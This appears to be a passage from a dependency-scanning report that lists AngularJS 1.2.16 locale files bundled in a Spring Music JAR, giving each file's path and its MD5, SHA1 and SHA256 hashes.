spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-cd.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-cd.jsMD5: 5acf9047471a9563382c7324ffca8af2SHA1: 4cc27fd815a25f6df624a8c06c5e0873f759e25cSHA256: 35be9df6783cda8d83f0e307cc5f4605fae6278f04005b40de31accc1c060fcf
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-cf.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-cf.jsMD5: 4bcab995234f08449c4e70019783f970SHA1: 672c971d87937dd0a627d8307c0cbbb3230c3697SHA256: ff1bbfa672e9b7e47b8f0ae2c6a5a9c2a24b38b4077083409d0cf971cd66cbb4
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-cg.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-cg.jsMD5: 14ed457ba02b2106539c6856ced97678SHA1: 57d8ea468d417ab87c7176cb772d1024d259c955SHA256: 6eaad3756adc17b69aa57519c59f6420446d283de7d70c6c3c4290daae08a2eb
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-ch.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-ch.jsMD5: 5c3af6e2464edbf680799781f9bd17edSHA1: 170d8415551e91fc7a3de5f5cbcc26e4e105ee2aSHA256: 1ba4d14e8f16d6121f193c650ffc51be561f7e0e3f335fe775ed73f21db59268
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-ci.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-ci.jsMD5: 49a8dc4b5491eee28217972a1d9f1fbaSHA1: aa25e0747e87e271c76f6c9132044d6cedaa74f3SHA256: 3f31fa4c82a06106b1ce2be1fc33d13334770c7f39a23b691260ad2b94cbbb69
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-cm.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-cm.jsMD5: bf540f9fc35e87b6c861fa1d3d6664f1SHA1: 7372399c2667a27db13802591b1dcea944d3ff2fSHA256: ffea2642066f3cb90173537ff2ad10e584a8594d9597d2cccd652f14ad47896b
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-dj.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-dj.jsMD5: dd3ea1b9a1b27e603e2dca66acab96b7SHA1: 24881d62909f88b05df6385c1ba6790d2031e6b5SHA256: 39ab36940a98499e972a4a07b36420a8b5f04c4d4b0b778d9c74872b25360ca6
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-fr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-fr.jsMD5: afed422350b2c4d5d9afe835350f526cSHA1: 88b96489544fd040693845e5816a4825cd18eeffSHA256: c1a6157fe9d6aac34ee7f68ef59e8c0cb1ec0701a4608a4ce7905261072b3cc9
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-ga.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-ga.jsMD5: 93843d4f7680364076924efeb1ba4d59SHA1: 1ae5921d6dabeb84eb75265388f3409bf2f2735dSHA256: d4348e6582f42d94288fd24f46d6d23c5265c447d28f4cdfc9d610021b882c51
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-gf.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-gf.jsMD5: 2730e52c178cd2a9f91ebea0dbb7ed37SHA1: 30da44da24a85e865cdd10819e83dacd69c91fc9SHA256: 2fcdcbe81231389f4dec1ba6a32bf182e9dde48881081b50e1c80c4f11ea3437
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-gn.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-gn.jsMD5: 4403eb2d38193044b42e3d67a4ddf067SHA1: a55515cd25a616ac8cfff8e31919699ad92cf4b6SHA256: fd5ef4d8ab8d1a86617a1a4f36bf96d2fe0a33cb0239906c4bb86bd12abaab44
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-gp.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-gp.jsMD5: f9fb0f9dc812fdaca34c550c89be1050SHA1: 5bb56d4cc2a83124444cb22e270709489f90b8c9SHA256: f098f8920132d2977cc1eb466ead9406ec5b81ae96b60e7779fea995fe38455a
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-gq.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-gq.jsMD5: bee0ec6d5c568aff5febc52dc7047524SHA1: 18cf27cf315f7b77a1f9dfc3f5ca8b695b9bb804SHA256: 571ba04071cf57f995f78470d2b648efcd64871bb28275afca09d5acfd3badc1
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-km.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-km.jsMD5: cf727f3fbd5c047af4da449842dec558SHA1: f639d6e2bcd1c8de74875b295eb8ebdbc38eb306SHA256: 5f23c4945c322bbf10c345951e895f111d54d2a69a1d5484d82f4f5f765dcd3d
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-lu.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-lu.jsMD5: c558d9f8f7a6de7283bbedcc7841f283SHA1: 546e1f8f6862d6b0beb3bea12cbda68f9e0a7992SHA256: 965977fcae7bbeb447b9e2713e0686cf0bf40f1db67c1b9801f282994666fdbe
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-mc.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-mc.jsMD5: 38f8ea87af205cd75e2f37033967399eSHA1: 618576c72670a82ae17453c73c8608767d48b7f2SHA256: bbae70ec09b3e779cd511d09736fc2a30c04569a8b9491e7887759f920179476
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-mf.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-mf.jsMD5: f851a63cc9997f4010d0fad63cb4dec9SHA1: 5d93a550697260aa1e12a04c9e750ada3c32e4bfSHA256: 27f634c682b2ee71b56a65f78b4b4b64f3f57aa4fad26985585422ad1a1839fd
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-mg.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-mg.jsMD5: 47ddcf985470dfe0037f4eb196380882SHA1: 0e4f8fd2d9ec0b1b350780124f072133bb66bd0fSHA256: ef9ac88c85eb902101364e0fac8ac99c0e551bae2f6057c78a36e4c2fb023431
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-ml.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-ml.jsMD5: 44bdbc0623d97243db498907f14bce73SHA1: 120e848ebfb8558467913a29ebad58686a91730bSHA256: a541c16bbd4131617598a35874fbb0a813b2cdbd4cb00a13030269fd3ad28cf7
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-mq.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-mq.jsMD5: b980469605f5630c2bc81e42a8796bccSHA1: 37a3e4597ba2119e7fd6450b92d21fd71d0cd20bSHA256: 8ad07d6e053f707b7c45ce5254024be6ee7a9bc9648e699f41617b08b6481259
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-ne.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-ne.jsMD5: 4f59cbd5db45f02b4c5a3489abb95207SHA1: 64bfe85d2c3603b995925a74ab63cff291b5727eSHA256: c50db30b0db5f1deba985a56d03f19484f7360fe8fb0cee3f8202ff0ca1ff5c9
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-re.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-re.jsMD5: 5749f4a52e62f4577e0d3fec47b8cd42SHA1: 568a8335928c8b712dd2b35686fee3cdb6c172acSHA256: 350d388776510b7a525eb6572ff16606c37f07613c433d6a49c9946b86d39ecb
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-yt.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-yt.jsMD5: 81c34f2e86590c1892882d9dd1df1bb6SHA1: 3b7ebce0939cc72195b4dfefdab0f7fccc42aa30SHA256: 312a69bc50184f45ee99a4e70d09880ca3175bdaff96e8cfa25560156767f4f5
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr.jsMD5: ccc2a5c0f3d1f5d490e5bcc4ee8490cdSHA1: 0ac35fa16e791db448ca5f6939e714c261d36482SHA256: b4d045fbf379221425b9db0a61ff9ec978ef79599a1e8a845cc9160949f390a0
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_gl-es.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_gl-es.jsMD5: 4de671d4595f4f8a62f3f9e56b494b7aSHA1: 0845bbbdc0dc9c28b30bf2342357ad83adb5a262SHA256: d5c72e1505a62be55a0868b89315f7b5cdec3f9cd158f999bd7f942551f493d8
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_gl.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_gl.jsMD5: 3614f73523bef9f711d0438c6c39031cSHA1: 22ea0e3aee14f217f88a95521e78d14db106ba97SHA256: f0424becc2711c7ccec735d30a5823780489985f5e17a9e7717d5072b9380bae
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_gsw-ch.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_gsw-ch.jsMD5: 55d8cca70af392856952dcc1ce027742SHA1: 05e4b07a6b742ab7d75c1d75122968871b8140e2SHA256: d39e650649f122beeb3c836201899ab0304cbf3175cf1675b7a66e10e01064a0
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_gsw.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_gsw.jsMD5: 0eba015634442d4cd7604270c824a464SHA1: 90ce98a2d9b51d9d14918c5ca1564f58209d0b3cSHA256: 9be1602638655676144c21b0c20542e9789c83e0c6bb4796b1090f6b598285d9
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_gu-in.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_gu-in.jsMD5: 5ff733f264bda216f4b94e6a6a8c09aeSHA1: cd0ede1ad91bcd8bd2c32ae8193e07c9a7ad804fSHA256: e527875adf221e4e6ad17d6ec468d18080694ccb2a38a2771b99e6e64e08cab3
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_gu.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_gu.jsMD5: eebfe679cd71a191d098e69478bc9b9fSHA1: 60fe13f75d1c5221d7b270e855bac4ad283967f4SHA256: bc21a35330c0d1da49d72c06256709e5b9ff9077e16daaff832002df82c0fe96
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_he-il.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_he-il.jsMD5: 344793ccd016737fed0cba312d5aafcbSHA1: 92f62aa3cae3fd0fa7af7f776139dadabd647de4SHA256: 595a5981ebcb57d8a2c48a230e0a63ec714396ece9ea5dbbcd1009d7582705a7
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_he.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_he.jsMD5: b61c92fe498631afe5a7ad8e54ae0947SHA1: 70edcd3b52176482a4a85f923a5f84d143166156SHA256: 5a87809505f2a2bf240820c1b629a53837765f82678a95a751c8f3ca9620d573
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_hi-in.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_hi-in.jsMD5: 8783fbf56886f9da2bb92022e3d579b5SHA1: 936457a1b3347f6887f8eed44ea0c2615350fbb9SHA256: 6b4e91b89584824287e946852d8cb60cfe7cfecd2a255ebb86794309b308a36f
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_hi.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_hi.jsMD5: a9c6ccfcf41b8cd2f85cd3b488d7458fSHA1: 21f72b0f0c7aad980b914169f0943bdc4cb97e7fSHA256: deb747107e6f2f26560b2dca55374f1518eb73b869ea6e332f692975511d52ab
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_hr-hr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_hr-hr.jsMD5: 271573e977ff37b352d7a5b65951a134SHA1: 776929decf3ebb83304040d5e7b71973135c27b3SHA256: 00a216befac37cc1005d9f30e6289e96379a91641d5b4ce16693b10575288365
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_hr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_hr.jsMD5: e379df48b004a1f4403c761f18fad960SHA1: 8b4c435c7675072daea765bab04ea43e2f2f046eSHA256: 15927d3d51916f688404edf2c2fb995530003e1fc884d16d1591b7f143f389c8
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_hu-hu.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_hu-hu.jsMD5: 1a682c3922956fe7da9e26ba326ce149SHA1: 1dfd2b846b0b0e2ddf608447822186d228e5c31aSHA256: 58b8b795542ddb99ca9ad32c438d343593be83840f39ad67e762db566eb395f6
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_hu.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_hu.jsMD5: 655a8e9632d7da8d4049314e9acc8767SHA1: 7f1f757eaa1a3e7440e478f7208e3c9a9d0207b4SHA256: a8491827a9edee1437927098b3550345589ec40ba2c6b5f1384aa9a5ca9b95cd
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_id-id.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_id-id.jsMD5: 95dc9bde7eb5b9fbf8ae9e8bf172897eSHA1: 806aad016857f7ead21cd99444100175d50aba0fSHA256: 8337765b43a6512ce0624b8e175cc0d7c8341cb3813767b1a1de5f824d392b03
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_id.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_id.jsMD5: 9c0d2c7c97d3e68129bf2efbda096837SHA1: 0a5b0d4ad0f2d49441129df3ce26d2902373b5ecSHA256: 1c24bb6d565842443451ddbac553ae7fa14f86ea411384d8d4a3719f498c0c79
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_in.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_in.jsMD5: e82a2ee0efbfac306d0bf833c3829cb6SHA1: 5d6025657df311961d5ae06a273b36b329b4f441SHA256: 090ebf0b766876d5ae2da13ff2c2fd93f1aa4a987372b44449c4ccc573636ac2
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_is-is.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_is-is.jsMD5: 4ac8d57b7dcb0ea4434a7d3b500daa44SHA1: 3f8557b09e9a57c218a76ac2153ada77bab82ff9SHA256: 25b261795082232bc0d4031c9629128ced085fff6ad5260e4385a675070c957e
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_is.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_is.jsMD5: 7c8adcfb0832f10488bf4c58d5506c03SHA1: e7a675102e48f08e1680046cd43a35799e7f7aefSHA256: f6c8d3b8cadadd2c9885c2d09e9e79d50268a58c4e7b4845ced4c7014665e41c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_it-it.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_it-it.jsMD5: 44949346e81e04906d0be762cd0dee55SHA1: b764bcff9ceee86ab698756e455da3ddc69b6855SHA256: 50e6ee8feaa0c4ce9ffe5b379a902248b3dd671d6e5fd124e511556486aa78e3
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_it-sm.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_it-sm.jsMD5: 83fb1e484a4d7a66de03e0fb52caabe5SHA1: fa51c3f20987be95ad7b461651ed8661411daf56SHA256: ff43bc5d530cf5818803ee347a360ec501c1da1cf42ad6da15228ddff3e86b5a
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_it.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_it.jsMD5: e67759a45a69d464bd543c49eaa75c78SHA1: 68bc5ac8e359911f38aef64b584ef4fee41a25e9SHA256: 641a4b0012e596d99dc82372612cb5877e6c8b33533d968896941d1da8e5f5c1
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_iw.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_iw.jsMD5: 455046a8a48c7942a6e4a93206003848SHA1: dee19ea6365eb0cdd6f3f423ef8021fa1b8f8452SHA256: e5d234269244a691942f4f298c77f078613d8d7ca9a2ee6c704728a905ccfb1c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ja-jp.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ja-jp.jsMD5: 56953e723edf83dd4b42687219e048ccSHA1: 1e48739d43f8f782c3e0a7c3d0c1f2e2bfef4ab2SHA256: 00c67c25fbbdc08ce4dd7b8581d7b523213e49cb7d47e9b1e2ce99f665465eb7
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ja.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ja.jsMD5: 8fb73aaed1baaed8b33d445fd3b46f49SHA1: 3e0040b7d567ef0f760b969690a587fcfd7c535bSHA256: af8897bbd08dc174fb9d01233d62b1b288d7b4be4ebb837f5f851290ae892f4a
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_kn-in.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_kn-in.jsMD5: cb61d4674353fb44360528b32eafb1a1SHA1: 8f3b23374cab65307d7e93196cc4d634d5b2e697SHA256: 33d52e88759e4cc4b49289002bc0fa254898b109b18350c289e0b6b2f462944a
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_kn.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_kn.jsMD5: c3033d2d26cca26be5bf98758a558a64SHA1: 264728fc101f857f34f560330efc97f0b27bfdc5SHA256: 0b82030d06d833e43824275082203146716ff5b95daa49a921354784a007ae72
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ko-kr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ko-kr.jsMD5: 254b33832a86d6f8bf28c6fa7b254da7SHA1: 6a0f6220460c36fa864666a9d572f9fea1fd94beSHA256: af1d2f590862da1686e03f4474b06c5038bf59b9fafd1b8976a5da8fe1673749
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ko.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ko.jsMD5: b65089d6cc0d60cd612e7d157f92bb97SHA1: 5fb6ad592dbb07ace5dfab6f6ab72fd9df19f798SHA256: 4dabb21b3828339a536583d883bb786a69c3e7da1a91152de5e66c0fc4ad49d7
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ln-cd.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ln-cd.jsMD5: cf13e705b9af3b69a1094176099d6fafSHA1: a3370aa93e0d69e76276128338458655c7e2ee26SHA256: af061f2c2f9cee331977bfcad26ee7efc77ffa0c24e758f76fd55699a346245e
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ln.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ln.jsMD5: 710ef14e23cceb81f8a27698e6eaeceaSHA1: 552136494f463d3d19c08c74971f8eeb5d5585d0SHA256: dbff5a2d23d06ea14d7da4ec474fb02bf868b1494b9b43cf117621ce87bd390c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_lt-lt.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_lt-lt.jsMD5: 4526fc8ccfe676e1b26beeb03c176aceSHA1: f0b415bc5cf27f477511ff23c62c9b0a4d0c4fbdSHA256: 5e9b4320510d952a0e1b7324c0b3a9445ddae24b9e4bfcd787e1d9158c8f089a
Evidence Type Source Name Value Confidence
